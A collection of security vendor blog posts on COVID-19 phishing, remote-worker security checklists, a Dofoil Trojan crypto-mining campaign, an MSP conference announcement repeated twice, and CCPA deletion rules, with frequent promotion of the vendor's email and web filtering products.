Healthcare providers are being targeted by spammers using COVID-19 phishing campaigns, with the attack showing no sign of letting up. The volume of attacks has led to the U.S. Federal Bureau of Investigation (FBI) to release a further warning to healthcare providers urging them to take steps to safeguard their networks and prevent the attacks.
The first significant COVID-19 themed phishing attacks targeting healthcare providers began being detected by around March 18, 2020. The attacks have increased over the following weeks and the lures have diversified.
Campaigns have been carried out targeting at-home healthcare staff who are supplying telehealth services to patients, and there has been an increase in business email compromise campaigns. The latter see vendors impersonated and requests issued for early or out-of-band payments due to struggles that are being experienced due to COVID-19.
The phishing attacks are being run to obtain login details and to spread malware, both of which are used to gain a foothold in healthcare networks to allow follow-on system exploitation, persistence, and the stealing sensitive data.
The malware being shared in these campaigns is very varied and includes data stealers such as Lokibot, backdoors, and Trojans such as Trickbot. Microsoft has recently made revealed that hat Trickbot accounts for the majority of COVID-19 phishing emails targeting Office 365 users, with a campaign last week involving hundreds of different, unique macro-laced files. Along with being a dangerous malware variant in its own right, Trickbot also installs other malicious payloads, including RYUK ransomware.
While the amount of COVID-19 themed phishing emails has been on the rise, the overall volume of phishing emails has not increased by a significant amount. What is happening is threat actors are changing their lures and are now using COVID-19 lures as they are more likely to be clicked on.
The campaigns can be highly very realistic. The lures and requests are believable, many of the emails are well written, and authorities on COVID-19 such as the Centers for Disease Control and Prevention, the HHS’ Centers for Medicare and Medicaid Services, and the World Health Organization have been tricked by this. In a lot of cases the emails are sent from a known individual and trusted contact, which makes it more probable that the email attachment will be opened.
The advice provided by the FBI is to follow cybersecurity best practices such as never clicking on unsolicited email attachments, regardless of who appears to have shared the email. Ensuring software is kept up to date and patches are applied quickly is also vital, as is disabling automatic email attachment downloads. The FBI has also recommended filtering out specific types of attachments using email security software, something that is easy to set up with SpamTitan.
The FBI has emphasised the importance of not opening email attachments, even if antivirus software indicates that the file is clean. As the Trickbot campaign shows, new strains of malicious documents and scripts are being created at an incredible rate, and signature-based detection methods cannot keep up with the pace. This is another area where SpamTitan can be of assistance. Along with using dual antivirus engines to detect known malware variants faster, SpamTitan includes sandboxing to identify and obstruct zero-day malware threats that have yet to have their signatures added to antivirus software virus definitions lists.
Training is crucial to show healthcare employees cybersecurity best practices to help them spot phishing emails, but it is also important to ensure that your technical controls are in a position to block these threats. For more guidance get in touch with TitanHQ now.
To assist those who are working remotely during the COVID19 Pandemic we have compiled a set of cybersecurity best practices for home workers to help IT teams prepare for a massive rise in telecommuting
The cybersecurity protections at home will not be as strong as protections in the office, which are much easier to implement and maintain. IT departments will therefore need to advise telecommuting workers cybersecurity best practices for home working and their devices will need to be set up to access applications and work resources securely. With so many workers having to telecommute, this will be a massive challenge.
The coronavirus pandemic has forced businesses to quickly grow the number of telecommuting workers and having to increase capacity in such a short space of time increases the potential for errors. Additionally, testing may not be nearly as stringent as necessary given the time pressure IT staff are under. Their teams too are likely to be much smaler due to self-isolating workers.
One area where standards are likely to fall is staff training on IT. Many staff will be working from home for the first time and will have to use new methods and applications they will not be used to. The lack of familiarity can easily lead to errors being made. It is important that even though resources are restricted you still teach cybersecurity best practices for home workers. Do not think that telecommuting workers will be aware of the steps they must take to work safely away from the office.
Measures for IT Teams to implement to Enhance Cybersecurity for Home Workers
Listed here are some of the main steps that IT teams need to take to improve security for employees that must now work from home.
Check VPNs are Provided and Updated
Telecommuting workers should not be allowed to access their work environment unless they use a VPN. A VPN will ensure that all traffic is encrypted, and data cannot be captured in transit. Enterprise-grade VPNs should be used as they are more robust and provide stronger security. Ensure there are sufficient licenses for all workers, and you have enough bandwidth available. You must also make sure that the VPN is running the most recent software version and patches are applied, even if this means some downtime to apply the updates. VPN vulnerabilities are under active attack.
Configure Firewalls for Remote Workers
You will have a firewall in place at the office and remote workers must have similar security measures in place. Software firewalls should be set up to protect remote workers’ devices. Home routers may have inbuilt firewalls show employees how to enable hardware firewalls if they have them on their home routers and ensure that passwords are set to stop unauthorized individuals from logging on with their home Wi-Fi network.
Use the Rule of Least Privilege
Remote workers bring with them new risks, and with large sections of the workforce telecommuting, that risk is considerable. Remote workers are being targeted by cybercriminals and through web- and email-based attacks. In the event of a malware infection or credential theft, damage can be managed by ensuring workers only have access to resources absolutely vital for them to perform their work duties. If possible, limit access to sensitive systems and data.
Ensure Strong Passwords are Being Used
To safeguard from brute force attacks, ensure good password practices are being adhered to. Consider using a password manager to help employees remember their passwords. The use of complex passwords should be policed.
Enable Multifactor Authentication
Multifactor authentication should be enabled on all applications that are accessed by remote workers. This measure will ensure that if credentials are compromised, system access is not allowed unless a second factor is provided.
Ensure Remote Workers’ Devices Have Antivirus Software Configured
Antivirus software must be configured on all devices that are allowed to connect to work networks and the solutions must be set to update automatically.
Set Windows Updates to Automatic
Working remotely makes it more difficult to monitor user devices and perform updates. Ensure that Windows updates are set to take place automatically outside of office hours. Instruct workers to leave their devices on to permit updates to take place.
Use Cloud-Based Backups
To stop accidental data loss and to protect against ransomware attacks, all data must be backed up. By using cloud-based backups, in the event of data loss, data can be brought back online from the cloud-backup service.
Use Cybersecurity Best Practices for Home Workers
All telecommuting workers must be shown how they need to access their work environment securely when working away from the office. Reinforce IT best practices with home workers, provide training on the use of VPNs, provide training on cybersecurity dos and don’ts when working remotely, and explain procedures for reporting problems.
Define Procedures for Dealing with a Security Incident
Members of the IT team are also likely to be working remotely so it is essential that everyone is aware of their role and responsibilities. In the event of a security incident, workers should have clear procedures to follow to ensure the incident is resolved quickly and efficiently.
Implement a Web Filter
A web filter will help to protect against web-based malware attacks by blocking access to malicious websites and will help to prevent malware downloads and the installation of shadow IT. Also consider applying content controls to limit employee activities on corporate-owned devices. Drive-by malware attacks have grown and the number of malicious domains registered in the past few weeks has gone up rapidly.
Use Encrypted Communication Channels
When you need to speak ot private message with telecommuting workers, ensure you have secure communications channels to use where sensitive information cannot be intercepted. Use encryption for email and safe text message communications, such as Telegram or WhatsApp.
Ensure Your Email Security Controls are Appropriate
One of the main cybersecurity best practices for home workers is to take additional care when opening emails. Phishing and email-based malware attacks have increased massively during the coronavirus pandemic. Ensure training is given to help employees spot phishing emails and other email dangers.
Think about augmenting email security to see to it that more threats are blocked. If you use Office 365, a third-party email security solution layered on top will give much better security. Exchange Online Protection (EOP) is unlikely to give the level of protection you need against phishing and zero-day malware attacks. Consider an email security solutions with data loss protection functions to keep you safe from against insider threats.
Search for Unauthorized Access
More devices linked to work environments makes it much more simple for threat actors to disguise malicious activity. Make sure monitoring is increased. An intrusion detection system that can spot anomalous user behavior would be a wide investment.
For more information on enhancing email security and web filtering to safeguard remote workers during the coronavirus pandemic, contact TitanHQ now.
The COVID-19 pandemic has forced businesses to rapidly scale up remote working. Before the 2019 Novel Coronavirus outbreak, many employees were spending some of the week working remotely but now businesses have had to allow virtually the entire workforce to work from home. While there are signs that the lockdown measures are having an effect and the number of new cases is starting to level off, it is likely to be some time before lockdowns are eased and life can return to normal. Even when governments start to ease restrictions, it is likely that most employees will have to continue to work from home for many more months.
Protecting a Remote Workforce from Cybersecurity Threats
At TitanHQ, we have seen the number of COVID-19 and Novel Coronavirus-themed phishing emails steadily grow over the past few weeks. Now, huge numbers of phishing emails are being sent that use COVID-19 as a lure to get remote workers to divulge their credentials or install malware. The email campaigns are highly varied, with some of the most common lures being the offer of a cure, information on how to protect against infection, advice to avoid transmission of the virus, and offers of the latest data on local cases.
One of the problems for IT departments is employees want all this information, so there is a high chance of at least some of those messages being opened by employees if they arrive in inboxes. Infected email attachments may be opened and clicks on links will see employees visit phishing websites where credentials are harvested or malware is downloaded.
Entire households are self-isolating together and schools are closed. Demands are being placed on employees that do not exist in the office, which means that concentration lapses are likely to occur, and that increases of a response to a phishing email.
It is therefore important for businesses to take steps to reduce risk. Cybersecurity awareness training for the workforce is critical to make employees aware of the threat of cyberattacks while they are working remotely and to reinforce education on cybersecurity best practices when working remotely. It is also essential for cybersecurity measures to be implemented that can reduce the risk of employees encountering a threat, and make sure that threats are neutralized if they are delivered.
Two Cybersecurity Solutions to Improve Protection for Remote Workers
There are two important cybersecurity solutions that can help in this regard. A powerful email security solution is required to improve the detection of phishing and malware threats and a web filtering solution to block attempts to visit malicious websites.
You will already have some email security measures in place to block spam and phishing emails, but for many businesses this will be the standard protections provided by Microsoft with Office 365. While Microsoft’s baseline level of security, provided through Exchange Online Protection, is reasonably effective at blocking spam email, it is far less effective at blocking phishing attacks and zero-day malware threats. Given the volume of phishing threats now targeting remote workers, you should consider bolstering your email security defenses by adding an additional layer of security on top of Exchange Online Protection.
SpamTitan Cloud is a powerful email security solution that will provide superior protection for Office 365. SpamTitan Cloud compliments EOP and will improve protection against the full range of email threats, including zero-day threats that often sneak past EOP. SpamTitan Cloud scans inbound email and uses machine learning techniques to identify never-before seen phishing threats and outbound email scanning to detect already compromised mailboxes and block spamming and malware distribution. Malware protection is improved with dual antivirus engines and sandboxing to detect and block zero-day malware threats. SPF and DMARC are also incorporated to identify and block email impersonation attacks.
Protection from web-based threats is also important. WebTitan Cloud is a powerful DNS filtering solution that can be used to protect workers on or off the network. Businesses can apply filtering controls to prevent employees from visiting malicious websites and stop work-issued devices from being used to access risky websites and those that serve no work purpose. In addition to blocking malware downloads and curbing cyberslacking, the solution can also be used to prevent the installation of shadow IT – the downloading and installation of unauthorized software solutions.
Both of these solutions can be implemented by businesses and MSPs remotely without the need to install any clients. They are easy to implement and maintain, and both solutions are extremely well priced.
For further information on improving cybersecurity for your remote workers, give the TitanHQ team a call today.
Blackpoint Cyber has unveiled its Remote Reality LIVE conference, which will take place over the Internet online April 8th and April 9th 2020.
The conference will concentrate on managed service providers (MSPs) and how they can stay safe, profitable, and resilient as the world rises remote operations during the COVID-19 pandemic – registration and attendance are free. The two-day conference will feature sessions by former leaders of the United States’ government cyber security and intelligence communities as well as cyber security experts and business experts from the MSP services and technology sector.
Jon Murchison, Blackpoint’s CEO and founder, and former US government cyber operations specialist, explains the conference’s aim: “IT services and infrastructure have become mission critical for organizations to survive in this new economic landscape brought on by COVID-19. MSPs are the key to our success and, especially during these times, a collective national asset to their respective countries. That’s why we are bringing together experienced government and industry leaders to help MSPs navigate the current economic and security environments. We’re excited to provide one of the first online and socially-distanced conferences dedicated to MSPs and cyber security.”
Blackpoint has worked with leading technology, service, and marketing firms for the conference, such as
Datto: leading global supplier of cloud-based software and technology solutions purpose-built for MSPs
Webroot: Cybersecurity Solutions Purpose-Built for MSPs and SMBs
Convergint: Global, Service-based Systems Integrator
Marketopia: Lead Generation and Marketing for Technology Businesses
ID Agent: Dark Web and Identity Theft Security
TitanHQ: Email and DNS Protection
Compliancy Group: HIPAA Compliance-as-a-Service
Atlantic Data Forensics: Leading Incident Response and Forensics
ProSource Technology Solutions: Leading Managed Service Provider
Corporate Office Properties Trust (COPT): Premier Real Estate Investment Trust
Michael Morell, former Deputy Director and Acting Director CIA, will provide the keynote session on national security implications of the Coronavirus Pandemic. While at the CIA, Mr. Morell was President George W. Bush’s daily intelligence advisor during the 9/11 attacks and was awarded the Distinguished Intelligence Medal, the CIA’s second highest honor.
Other former US government cyber security and intelligence-related speakers include: Bill Priestap, former FBI Assistant Director of Counterintelligence, Chris Inglis, Former Deputy Director of NSA, Dave Sears, former Commander and Navy SEAL, and Kevin Donegan, former United States Navy Vice Admiral and former commander of the US Navy’s 5th fleet out of Bahrain. Security and MSP sector leaders will also present informational sessions, such as lead generation in a virtual world, security in the MSP space, cyber security for commercial real estate, the threat landscape of remote workers, and others.
Matt Solomon, VP of Business Development & IT at ID Agent, said: “ID Agent is very excited to participate in one of the first virtual MSP events since in-person events have been taken off the schedule. MSPs still need education during this period and we are honored to be part of such an esteemed group of vendors.”
In addition to learning how to stay secure and prosper, conference attendees will also qualify for giveaways and prizes.
Blackpoint Cyber announced its Remote Reality LIVE conference, which will occur online April 8th and April 9th 2020.
The conference will focus on managed service providers (MSPs) and how they can stay secure, profitable, and resilient as the world increases remote operations during the COVID-19 pandemic – registration and attendance are free. The two-day conference will include sessions by former leaders of the United States’ government cyber security and intelligence communities as well as cyber security experts and business veterans from the MSP services and technology industry.
Blackpoint Cyber announces its virtual cyber security conference for MSPs – Remote Reality LIVE. Featuring a keynote from the former Acting Director of the CIA and sessions from tech giants Datto, Webroot, Marketopia, and more.
Jon Murchison, Blackpoint’s CEO and founder, and former US government cyber operations expert, explains the conference’s objective: “IT services and infrastructure have become mission critical for organizations to survive in this new economic landscape brought on by COVID-19. MSPs are the key to our success and, especially during these times, a collective national asset to their respective countries. That’s why we are bringing together experienced government and industry leaders to help MSPs navigate the current economic and security environments. We’re excited to provide one of the first online and socially-distanced conferences dedicated to MSPs and cyber security.”
Blackpoint has partnered with leading technology, service, and marketing firms for the conference, including:
Datto: leading global provider of cloud-based software and technology solutions purpose-built for MSPs
Webroot: Cybersecurity Solutions Purpose-Built for MSPs and SMBs
Convergint: Global, Service-based Systems Integrator
Marketopia: Lead Generation and Marketing for Technology Companies
ID Agent: Dark Web and Identity Theft Protection
TitanHQ: Email and DNS Security
Compliancy Group: HIPAA Compliance-as-a-Service
Atlantic Data Forensics: Premier Incident Response and Forensics
ProSource Technology Solutions: Leading Managed Service Provider
Corporate Office Properties Trust (COPT): Premier Real Estate Investment Trust
Michael Morell, former Deputy Director and Acting Director CIA, will present the keynote session on national security implications of the Coronavirus outbreak. While at the CIA, Mr. Morell was President George W. Bush’s daily intelligence briefer during the 9/11 attacks and was awarded the Distinguished Intelligence Medal, the CIA’s second highest honor.
Additional former US government cyber security and intelligence expert speakers include: Bill Priestap, former FBI Assistant Director of Counterintelligence, Chris Inglis, Former Deputy Director of NSA, Dave Sears, retired Commander and Navy SEAL, and Kevin Donegan, former United States Navy Vice Admiral and previous commander of the US Navy’s 5th fleet out of Bahrain. Security and MSP industry leaders will also present informational sessions, such as lead generation in a virtual world, security in the MSP space, cyber security for commercial real estate, the threat landscape of remote workers, and more.
Matt Solomon, VP of Business Development & IT at ID Agent, shares his sentiments on the conference: “ID Agent is very excited to participate in one of the first virtual MSP events since in-person events have been taken off the schedule. MSPs still need education during this period and we are honored to be part of such an esteemed group of vendors.”
In addition to learning how to stay secure and prosper, conference attendees will also be eligible for giveaways and prizes.
IT departments face a major challenge ensuring mobile devices used by remote workers are secured and that challenge has just got bigger as a result of the 2019 Novel Coronavirus pandemic with so many employees now working from home. To help IT departments manage security risks, we have compiled a cybersecurity checklist for remote workers detailing steps that can be taken to deal with the challenges of having a largely remote workforce.
Given time, IT departments can make sure mobile devices are configured correctly, are free from vulnerabilities, and have all the necessary software and security solutions installed to allow employees to securely work from home. Training can also be provided to remote workers to teach them cybersecurity best practices and how to practice good IT hygiene; however, the speed at which the 2019 Novel Coronavirus has spread has meant employers and their IT departments have had little time to prepare and have had to accommodate massive numbers of employees self-isolating and working from home.
Telecommuting Cybersecurity Risks
A massive increase in remote workers significantly increases the attack surface. Not only have many devices left the protection of corporate firewalls, additional software solutions have had to be installed to ensure workers can continue to be productive at home. Videoconferencing software is required, chat platforms need to be used to maintain contact, and VPNs are required to secure connections over the internet.
The cybersecurity risks introduced by telecommuting are considerable. Even solutions used to improve security can be turned against an organization. VPNs will ensure connections to work networks are secured, but if VPN credentials are compromised, attackers can use them to gain access to corporate networks undetected and VPNs can be turned into pipelines for delivering malware.
In 2019, several popular VPN solutions were found to contain critical vulnerabilities that allowed attackers to easily gain access to credentials. While patches were promptly developed and released to correct the flaws, many businesses failed to perform updates quickly. Even today, almost a year after the patches were released, some companies are still using vulnerable VPNs. Cybercriminals have been quick to take advantage and attacks on vulnerable VPNs have increased significantly.
When workers are in the office collaboration is easy. Close collaboration needs to be maintained when the majority of the workforce is working from home. IT teams must try to ensure the same communication tools that are used in the office are still available to remote workers. If not, employees will find their own ways of communicating, which may not provide the required level of security. If employees start using Google Drive for sharing files for instance, IT departments will lose visibility and will not be able to tell where sensitive data is being stored or transmitted.
With so many home workers due to the 2019 Novel Coronavirus and COVID-19, use of videoconferencing solutions has skyrocketed. Many platforms are now being used, although Zoom is one of the most popular choices. While this videoconferencing platform claims to offer end to end encryption, it has recently been discovered that Zoom’s interpretation of end-to-end encryption is different to other solution providers. While Zoom meetings are encrypted from Zoom client to Zoom client, Zoom has access to audio and video. Many companies have instructed their remote workers to stay in touch using Zoom but may now have to reconsider and use a platform with true end-to-end encryption. Vulnerabilities have also been identified in the platform in the past few days which could be exploited to gain access to sensitive data.
Phishing campaigns are being conducted to gain access to the credentials of remote workers. Cybercriminals are well aware that attacks are much easier on remote workers, and the large numbers of remote workers connecting to networks allows them to easily hide their malicious connections.
The COVID-19 crisis is likely to be a particularly stressful time for IT departments. While the cybersecurity risks increase with remote workers, it is possible to implement tools to manage risk effectively, protect sensitive data, and allow work to continue until life returns to normal again.
Internet Security and Telecommuting Workers
Working from home can be a challenge as there are many distractions that are not present in the office. It is often difficult for workers to separate work life from home life, and that applies to IT as well. Remote workers are likely to be tempted to use their work devices for personal internet use, rather than powering up their personal devices. It is important for policies to be established covering the allowable uses of company devices and those policies should be enforced. If corporate laptops are used for personal internet use, the risk of malware infections will increase.
The easiest way to enforce policies is with a web filtering solution. A web filter, such as WebTitan, allows IT teams to carefully control the online activities of employees and manage risk. With WebTitan in place, companies can enforce their acceptable internet usage policies and prevent their employees from visiting websites used for phishing and malware distribution. Since WebTitan integrates with Active Directory and LDAP, IT teams can easily monitor the online activities of each employee, identify potentially risky behavior in real time and take action to address those risks.
Rise in Phishing Attacks Warrants Email Security Improvements
The 2019 Novel Coronavirus pandemic has provided cybercriminals with many opportunities for conducting phishing attacks and distributing malware. The first major coronavirus-themed phishing campaigns were detected in January 2020 and in the weeks that have followed the volume of messages has soared. People want up to date information on COVID-19 cases in their local area and advice on protecting against infection. Cybercriminals have been all too happy to oblige.
The campaigns we have identified have included highly convincing scams impersonating authorities such as the Centers for Disease Control and Prevention and the World Health Organization. The emails claim to offer important advice and updates about the Novel Coronavirus and COVID-19 but install malware and steal credentials. Remote workers are being targeted with emails spoofing their own HR departments, telling them about new protocols that must be adopted following infections in the office. A day doesn’t go by without another phishing scam being uncovered.
The increase in phishing attacks coupled with the rise in remote workers means steps should be taken to improve email security, especially for Office 365 accounts, which are being targeted by cybercriminals. While standard Office 365 email security provided by Exchange Online Protection (EOP) may have been sufficient to protect against low level phishing attacks, the increase in targeted attacks means greater protection is now required. Businesses should consider adding another layer of protection with a third-party email security solution such as SpamTitan. In contrast to EOP, SpamTitan offers sandboxing to protect against zero-day malware threats and provides superior protection against phishing and spear phishing attacks.
Employer Cybersecurity Checklist for Remote Workers
Employers and IT departments can take several steps to reduce cybersecurity risks for remote workers. We hope this cybersecurity checklist for remote workers will help you to identify and address cybersecurity risks.
Ensure a VPN client is installed on remote workers’ devices, that it is updated to the latest version, and remote workers have been trained how to use the VPN
Restrict access to resources that are not required by workers and use the principle of least privilege
Block the use of USB devices on remote users’ devices
Get remote workers to check their Wi-Fi connection is secure, that a strong password has been set, and encryption is enabled.
Set up systems to recognize probes and packet sniffers
Implement encryption on devices to protect data at rest
Ensure software is kept up to date and patches are applied promptly
Ensure antivirus software is installed on all users’ devices and it is set to update automatically. Perform regular scans to identify malicious code
Make sure all data is backed up to prevent against accidental loss and to ensure recovery is possible in the event of a ransomware attack
Ensure screens are set to lock after a period of inactivity to prevent devices and data from being accessed by unauthorized individuals.
Augment email security and create layered defenses to protect against phishing attacks
Implement a web filter to prevent workers from accessing malicious websites
Use cloud applications for sharing sensitive data with remote workers rather than email
Provide ongoing security awareness training to employees to make sure they are aware of the cybersecurity risks for remote workers and are taught how to identify phishing and other threats
Ensure complex passwords are set and password policies are enforced
Enable multifactor authentication for email and cloud applications. If credentials are compromised, access will not be permitted without an additional authentication factor
Set computer use policies for remote employees. Make sure employees are aware that corporate devices can only be used for work purposes
Ensure support is always available for remote workers and prioritize support for remote access solutions and security issues
Make sure all employees are aware of the procedures to follow for security incidents
Step up network monitoring and ideally use an intrusion detection solution and AI-based tool to identify anomalous user behavior that could be indicative of an insider threat or cyberattack in progress
A huge campaign distributing the Dofoil Trojan has been discovered by Microsoft. The campaign has already witnessed almost half a million PCs infected with the malware in less than 12 hours. The Dofoil Trojan is otherwise referred to as Smoke Loader – an installer that has been in operation for many years.
The Dofoil Trojan is a small application which once downloaded to a PC is capable of downloading other forms of malware. The Dofoil Trojan has been used in many campaigns since at least 2011 to download malware, with the latest campaign used to install cryptocurrency mining malware.
This was first noticed on March 6 when Windows Defender discovered almost 80,000 instances of the Trojan on PCs with the number rising rapidly to more than 400,000 in the next 12 hours. Several strains of the Dofoil Trojan were being used in the campaign which was mostly focusing on devices in Russia, Ukraine, and Turkey.
The cryptocurrency mining malware is being deployed to mine Electroneum coins on infected devices, although the malware can mine other cryptocurrencies.
Spotting the malware can be tricky as it uses process hollowing to create a new instance of an authentic Windows process for malicious purposes. In this case the malware is masked as a Windows binary file to avoid detection – wuauclt.exe. Explorer.exe is used to establish a copy of the malware in the Roaming AppData folder which is relabelled as ditereah.exe. The Windows registry is also altered to ensure persistence, changing an existing entry to point to the malware copy. The malware communicates with its C2 server and is also capable of downloading additional malware variants onto an infected device.
While Microsoft was able to spot infections, what is not known at this stage is how the malware was downloaded on so many devices in such as short space of time. While the malware could possibly have been shared using spam email, another means of distribution is suspected. Microsoft notes that in many cases the malware is believed to have been spread using torrent files, which are used in P2P file sharing, often to obtain pirated movies, music, and software.
Microsoft has only made known the number of infections it has detected using Windows Defender. The company does not have visibility into devices that do not have the anti-malware software downloaded. The overall number of infections is therefore likely to be much more. The 400,000+ infections are likely to be just the start of it.
Microsoft notes that its attempts to disrupt the operation did not just prevent devices from mining cryptocurrencies. Infection with the Dofoil Trojan allows the hackers to install any number of extra malicious payloads including more dangerous malware variants and ransomware.
The coronavirus pandemic has forced many workers into telecommuting and the number people working from home has soared over the past two months. During this difficult time, IT security must take additional steps to protect remote employees from cybersecurity threats as cyberattacks on remote workers are increasing.
5 Steps to Take to Protect Remote Employees from Cybersecurity Threats
Businesses need to implement new measures to protect remote employees from cybersecurity threats. The number of employees now working from home makes cyberattacks on remote workers more likely. Already we have seen many campaigns targeting remote employees that aim to steal remote access credentials and infect devices with malware.
Vulnerabilities can easily be introduced when large numbers of employees work from home which can easily be exploited by cybercriminals to gain access to employees’ devices, cloud resources, and business networks. Here we provide 5 important steps to take to protect remote employees from cybersecurity threats during the coronavirus pandemic.
Use an Enterprise Grade VPN
It is important that remote workers only access work resources using a VPN; however, simply using a VPN does not make home working secure. Consumer-grade VPNs are very different from enterprise VPNs and should not be used, but even enterprise-grade VPNs are not necessarily secure and can have vulnerabilities that can easily be exploited by cybercriminals. The UK’s National Cyber Security Center (NCSC) has warned that APT groups are conducting attacks exploiting unpatched vulnerabilities in VPN solutions from Pulse Secure, Fortinet, and Palo Alto Networks. These vulnerabilities identified from April 2019 to July 2019, yet many businesses have not applied the patches. While patching can be difficult as VPNs are often in use 24/7, it is essential that patches are applied promptly. Malicious cyber actors are targeting VPNs and attacks are likely to continue to increase with more employees working from home.
Ensure All Devices Are Patched and Updated
Before any employee is allowed to work remotely, IT security teams must ensure that their laptops are fully up to date and are running the latest versions of operating systems and software. The Coronavirus pandemic is likely to last for several months, so policies and procedures must be developed to ensure that users’ devices are kept up to date. You must also ensure that endpoint protection solutions, antivirus software, and Windows update settings are configured to update automatically.
Enhance Email Security
The majority of cyberattacks start with a phishing email so it is essential to have an advanced email security solution in place. Businesses should not rely on the protection provided by Microsoft for Office 365 for blocking phishing and malware attacks. A third-party email security solution should be layered on top of the protections provided by Microsoft for Office 365. Layered defenses are essential to protect remote employees from cybersecurity threats.
SpamTitan provides enhanced protection from phishing, spear phishing, malware, and ransomware for Office 365 accounts, complimenting and augmenting the protections provided by Microsoft. SpamTitan is cloud-based, so it can be easily applied and used to protect all email accounts, regardless of the platform you use.
Protect Against Web-Based Attacks
Email is the most likely way that cybercriminals will conduct cyberattacks on remote workers, but measures also need to be implemented to block web-based attacks such as drive-by malware downloads. CheckPoint reports there have been more than 16,000 COVID-19 and coronavirus themed domains registered since January and the number is growing at an incredible rate. These domains are 50% more likely to be malicious than other domains registered in the same period.
The easiest way to protect against web-based attacks is to use a cloud-based web filtering solution. WebTitan Cloud provides protection against web-based attacks by blocking access to malicious domains and websites that have a higher risk of hosting malware.
Provide Additional Training for Remote Employees
Research conducted by PurpleSec indicates 98% of all cyberattacks involve social engineering and Cofense research suggests more than 90% of cyberattacks start with a phishing email. It is therefore important for training to be provided to employees to help them identify social engineering and phishing attacks. Security awareness training for employees should be provided regularly and it is also useful to conduct phishing simulation exercises to identify employees that require further training. You also need to reinforce general IT cybersecurity best practices with remote workers to prevent them from engaging in risky behaviors.
Contact TitanHQ today for further information on protecting your remote employees against email- and web-based attacks.
During this unprecedented time of uncertainty, the health and safety of our employees, customers, partners and their families is one of our main focuses and concerns. Team TitanHQ are fully committed to supporting our partners and customers. The benefits from our email and web security products are even more relevant and important now.
Our fantastic team has jumped at the challenge with vigor and we have mobilized our workforce so that it’s business as usual over this unusual phase. We are taking advice from the government on best practice and have a task force in place to manage our progress.
Customers and partners can rest assured that support teams will continue to be available and product teams are working as normal. If you have any questions or concerns about products, or technical support, please contact us in the usual way. The support team has been trained to be aware of special customer concerns during this period and will escalate any question to the appropriate responsible person or department.
We are aware that this is a sensitive time and we will make sure to go the extra mile to make it easier for our customers. All of us at TitanHQ wish you good health and thank you for your continued support.
Under CCPA, Californians can request to have their personal data deleted, but there are CCPA data deletion exceptions you should be aware of. Not all personal data needs to be deleted.
Who Must Comply with CCPA?
The California Consumer Privacy Act gave Californians new rights over their personal data. From January 1, 2020, organizations that conduct business in the state of California are required to comply with CCPA if they have annual gross revenues of more than $25 million, handle the personal data of 50,000 or more consumers, or derive more than 50% of their annual revenue from the sale of personal information.
The CCPA Right to Delete
One of the new rights given to consumers is the right to have their personal data deleted. CCPA applies to personal data that identifies, relates to, describes, or can be associated with an individual or household, directly or indirectly.
When consumers exercise the right to delete, organizations are required to comply within 45 days, but there are CCPA data deletion exceptions. If data is not going to be deleted, the consumer must be informed without unreasonable delay and no later than 45 days after the request has been received. This timescale does not apply to data contained in archive or backup systems. The deletion of personal data stored in an archive or backup can be delayed until the next time the archive or backup is accessed or used.
When a data deletion request is received, an organization must take reasonable steps to verify that the request to delete data has been sent by the individual about whom the data relates. All personal data must then be deleted; however, there are 9 CCPA data deletion exceptions.
CCPA Data Deletion Exceptions
Businesses are not required by law to delete data that is required to perform 9 specific activities:
Data does not need to be deleted if it is required to complete the transaction for which the data was collected or to provide goods or services that have been requested by the consumer. Data does not need to be deleted if it is “reasonably anticipated within the context of a business’s ongoing business relationship with the consumer, or otherwise perform a contract between the business and the consumer.”
If personal data, such as data contained in server logs, is needed to detect security incidents, protect against malicious, deceptive, fraudulent or illegal activity to allow prosecution of the persons responsible for those activities, it should not be deleted.
If personal data is needed to debug or identify and repair errors that impair existing functionality.
While the CCPA helps protect the privacy of consumers, it is secondary to free speech. Personal data does not need to be deleted in order to allow the exercise of free speech, and to ensure the right of another consumer to exercise his or her right of free speech, or to exercise another right provided for by law.
Personal data does not need to be deleted if it is required to ensure compliance with the California Electronic Communications Privacy Act (CalECPA).
Personal data is excepted from deletion if it is required to comply with other legal obligations, such as data retention laws.
Research Conducted in the Public Interest
Personal information of consumers that is used for research conducted in the public interest does not need to be deleted. This includes personal data that is collected and maintained for peer-reviewed, scientific, historical, or statistical research in the public interest if deletion of the data would seriously impair the achievement of the research, provided the consumer has previously provided informed consent for their personal data to be used for research.
Expected Internal Uses
Data is exempt from detection requests if it is required to enable solely internal uses reasonably aligned with the expectations of the consumer based on the consumer’s relationship with the business.
Other Internal Uses
Personal data does not need to be deleted if it is required for other internal uses which, in a lawful manner, are compatible with the context in which the consumer provided their personal data.
Enforcement of CCPA Compliance
The California Attorney General is tasked with enforcing compliance with CCPA and has the authority to issue financial penalties for noncompliance up to $2,500 per violation or $7,500 for an intentional violation. Californian consumers are permitted to take legal action against organizations over data breaches and can claim damages between $100 and $750 per data breach.
In this post we explain the CCPA requirements for businesses and the most important elements of the California Consumer Privacy Act.
What Businesses Must Comply with CCPA?
Unlike the EU’s General Data Protection regulation (GDPR), which applies to all businesses that collect or process the data of EU residents, CCPA only applies to for-profit businesses that meet certain criteria. Any business that meets one or more of the criteria below is required to comply with CCPA.
Has annual revenues of more than $25 million
Collects information on 50,000 or more California households or residents each year
Earns 50% or more of its annual revenue from the sale of the consumer data of California residents
These requirements may be updated or expanded to include a wider range of companies. Make sure you keep up to date with any changes to CCPA if you collect or process the data of U.S consumers.
It is not just companies with a base in California that are required to comply with CCPA. Any company that does business in California or collects or processes the data of California residents is required to comply with CCPA.
What are the CCPA Consumer Rights
CCPA was introduced to give California residents greater control over their personal data.
Consumer rights under CCPA include:
Right to know what personal data is being collected
Right to know what personal data is held by a company
Right to know how personal data is being used by a company
Restriction of the use and sale of personal data of minors (under 13) without parental consent
Restriction of the use and sale of personal data of minors (13-16) without direct consent
Right to delete all personal data held by a company
Right to opt-out of having personal data sold
Right to non-discrimination, in terms of price or services, if CCPA rights are exercised
Right to take legal action against companies for privacy violations and the failure to honor CCPA rights
Requests from consumers must be confirmed within 10 days and honored within 45 days
Key CCPA Requirements for Businesses
Businesses must ensure consumers are notified about the collection of their personal data before data is collected and consumers should be given the option of opting out of the collection of their data or the sale of their data. Personal data should only be collected for specific and legitimate purposes.
Maintain procedures to respond to requests from consumers to access their data, delete their data, and opt out of the sale of their personal information. Procedures must also be developed and maintained relating to the collection and use of the personal information of minors.
Businesses must offer consumers two methods for consumers to request data and arrange to have their data deleted. One method that is mandatory is a toll-free telephone number. If a business primarily operates online, a web-based method should be offered.
Any member of staff that handles consumer data must be trained on the requirements of CCPA. Oversight of compliance must be delegated to an individual or team.
Business must verify the identity of the consumer prior to providing their data or deleting data after a request is received from a consumer.
